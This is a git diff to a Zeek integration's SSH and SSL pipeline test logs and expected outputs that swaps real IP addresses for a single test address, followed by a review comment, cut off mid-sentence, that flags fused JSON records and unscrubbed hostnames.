"{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log index a4545506e31..056aff668f2 100644 --- a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log +++ b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log 
@@ -1,5 +1,5 @@ {"ts":1562527532.904291,"uid":"CajWfz1b3qnnWT0BU9","id.orig_h":"192.168.1.2","id.orig_p":48380,"id.resp_h":"192.168.1.1","id.resp_p":22,"version":2,"auth_success":false,"auth_attempts":2,"client":"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10","server":"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1","cipher_alg":"chacha20-poly1305@openssh.com","mac_alg":"umac-64-etm@openssh.com","compression_alg":"none","kex_alg":"curve25519-sha256@libssh.org","host_key_alg":"ecdsa-sha2-nistp256","host_key":"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd"} -{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"51.161.10.160","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} -{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"113.53.238.195","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} -{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"34.86.35.26","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"} +{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"89.160.20.156","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} +{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"89.160.20.156","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} +{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"89.160.20.156","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"} 
{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/ssh.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json index f92a8eff4d2..571b3271453 100644 --- a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json +++ b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json 
@@ -42,7 +42,7 @@
 "ip": "192.168.1.2"
 },
 "event": {
- "ingested": "2021-08-11T19:18:39.341768100Z",
+ "ingested": "2021-12-09T13:51:12.452231300Z",
 "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -72,7 +72,7 @@
 },
 "related": {
 "ip": [
- "51.161.10.160",
+ "89.160.20.156",
 "10.156.0.2"
 ]
 },
@@ -93,27 +93,30 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "Canada",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -79.3716,
- "lat": 43.6319
- },
- "country_iso_code": "CA"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 16276,
+ "number": 29518,
 "organization": {
- "name": "OVH SAS"
+ "name": "Bredband2 AB"
 }
 },
- "address": "51.161.10.160",
+ "address": "89.160.20.156",
 "port": 38204,
- "ip": "51.161.10.160"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-08-11T19:18:39.341793700Z",
- "original": "{\"ts\":1617123417.413634,\"uid\":\"COXxsJ3dlSh6ECRYQj\",\"id.orig_h\":\"51.161.10.160\",\"id.orig_p\":38204,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}",
+ "ingested": "2021-12-09T13:51:12.452241800Z",
+ "original": "{\"ts\":1617123417.413634,\"uid\":\"COXxsJ3dlSh6ECRYQj\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38204,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "COXxsJ3dlSh6ECRYQj",
@@ -130,7 +133,7 @@
 ],
 "network": {
 "protocol": "ssh",
- "community_id": "1:fEvwFYOBXBS6afWiC3Wd7zi4ym8=",
+ "community_id": "1:QGlqHtMfOLw8OB6pGB9IpiEjOns=",
 "transport": "tcp"
 }
 },
@@ -141,7 +144,7 @@
 },
 "related": {
 "ip": [
- "113.53.238.195",
+ "89.160.20.156",
 "10.156.0.2"
 ]
 },
@@ -162,27 +165,30 @@
 },
 "source": {
 "geo": {
- "continent_name": "Asia",
- "country_name": "Thailand",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 100.4667,
- "lat": 13.75
- },
- "country_iso_code": "TH"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 131293,
+ "number": 29518,
 "organization": {
- "name": "TOT Public Company Limited"
+ "name": "Bredband2 AB"
 }
 },
- "address": "113.53.238.195",
+ "address": "89.160.20.156",
 "port": 44164,
- "ip": "113.53.238.195"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-08-11T19:18:39.341802800Z",
- "original": "{\"ts\":1617123445.61524,\"uid\":\"CZPdXz1jfKSWzIDAeb\",\"id.orig_h\":\"113.53.238.195\",\"id.orig_p\":44164,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}",
+ "ingested": "2021-12-09T13:51:12.452248100Z",
+ "original": "{\"ts\":1617123445.61524,\"uid\":\"CZPdXz1jfKSWzIDAeb\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":44164,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CZPdXz1jfKSWzIDAeb",
@@ -199,7 +205,7 @@
 ],
 "network": {
 "protocol": "ssh",
- "community_id": "1:GsVj5goD0raV3RtUCa7RbCE4LM0=",
+ "community_id": "1:O601cjibDdZfkinhYZ/6g88dhVg=",
 "transport": "tcp"
 }
 },
@@ -210,7 +216,7 @@
 },
 "related": {
 "ip": [
- "34.86.35.26",
+ "89.160.20.156",
 "10.156.0.2"
 ]
 },
@@ -231,27 +237,30 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 15169,
+ "number": 29518,
 "organization": {
- "name": "Google LLC"
+ "name": "Bredband2 AB"
 }
 },
- "address": "34.86.35.26",
+ "address": "89.160.20.156",
 "port": 33953,
- "ip": "34.86.35.26"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-08-11T19:18:39.341811Z",
- "original": "{\"ts\":1617123450.957272,\"uid\":\"Cha1rs3OamonAZ4Nz6\",\"id.orig_h\":\"34.86.35.26\",\"id.orig_p\":33953,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-ZGrab ZGrab SSH Survey\"}",
+ "ingested": "2021-12-09T13:51:12.452253900Z",
+ "original": "{\"ts\":1617123450.957272,\"uid\":\"Cha1rs3OamonAZ4Nz6\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":33953,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-ZGrab ZGrab SSH Survey\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "Cha1rs3OamonAZ4Nz6",
@@ -268,7 +277,7 @@
 ],
 "network": {
 "protocol": "ssh",
- "community_id": "1:hQmKiiCVA2EG4uaydkM5n4w8EZ4=",
+ "community_id": "1:r0AFDEZ24hQ9fR/G+AgLwQmwmc0=",
 "transport": "tcp"
 }
 },
@@ -330,7 +339,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:39.341818100Z",
+ "ingested": "2021-12-09T13:51:12.452259700Z",
 "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log
index bd8bb284045..e717fff3a89 100644
--- a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log
+++ b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log
@@ -1,10 +1,10 @@
-{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}
-{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}
-{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert 
Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224}
-{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"46.101.87.151","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false}
-{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"35.195.125.46","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false}
-{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"35.198.74.222","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false}
-{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"35.198.74.222","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false}
-{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"104.154.89.105","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"}
-{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"35.195.125.46","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false}
-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 
UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/ssl.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}
+{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}
+{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain 
View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224}
+{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false}
+{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"89.160.20.156","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false}
+{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"89.160.20.156","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false}
+{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"89.160.20.156","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false}
+{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"}
+{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"89.160.20.156","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false}
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed 
certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/ssl.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
diff --git a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json
index b723863999d..5fb44d81860 100644
--- a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json
+++ b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json
@@ -2,30 +2,30 @@
 "expected": [
 {
 "server": {
- "address": "35.199.178.4"
+ "address": "89.160.20.156"
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Mountain View",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -122.0748,
- "lat": 37.4043
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 15169,
+ "number": 29518,
 "organization": {
- "name": "Google LLC"
+ "name": "Bredband2 AB"
 }
 },
- "address": "35.199.178.4",
+ "address": "89.160.20.156",
 "port": 9243,
- "ip": "35.199.178.4"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "CAOvs1BMFCX2Eh0Y3",
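Review bot: The third new-side record of test-ssl.log still carries two JSON documents fused on one line (`\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,...`), and the expected output further down shows the pipeline keeping that whole string as `event.original` of `CfGBt82PzCXzHa0iek`, so the `CK17Dl2SB8bZOVonSl` record with `ja3`, `ja3s`, `resp_certificate_sha1` and `not_valid_before`/`not_valid_after` is never parsed as an event of its own. If that is not a deliberate malformed-input case, a newline between the two objects would bring those fields into the test. Separately, the IP scrub does not extend to `server_name`: `splunk-api.swiftcrypto.com`, `rundeck.swiftcrypto.com` and `tickets.swiftcrypto.com` look like a real organisation's service hostnames and could be swapped for RFC 2606 names such as `splunk-api.example.com` in the same pass. Note also that `89.160.20.156` is now both the TLS server of the `*.gcp.cloud.es.io` connections and 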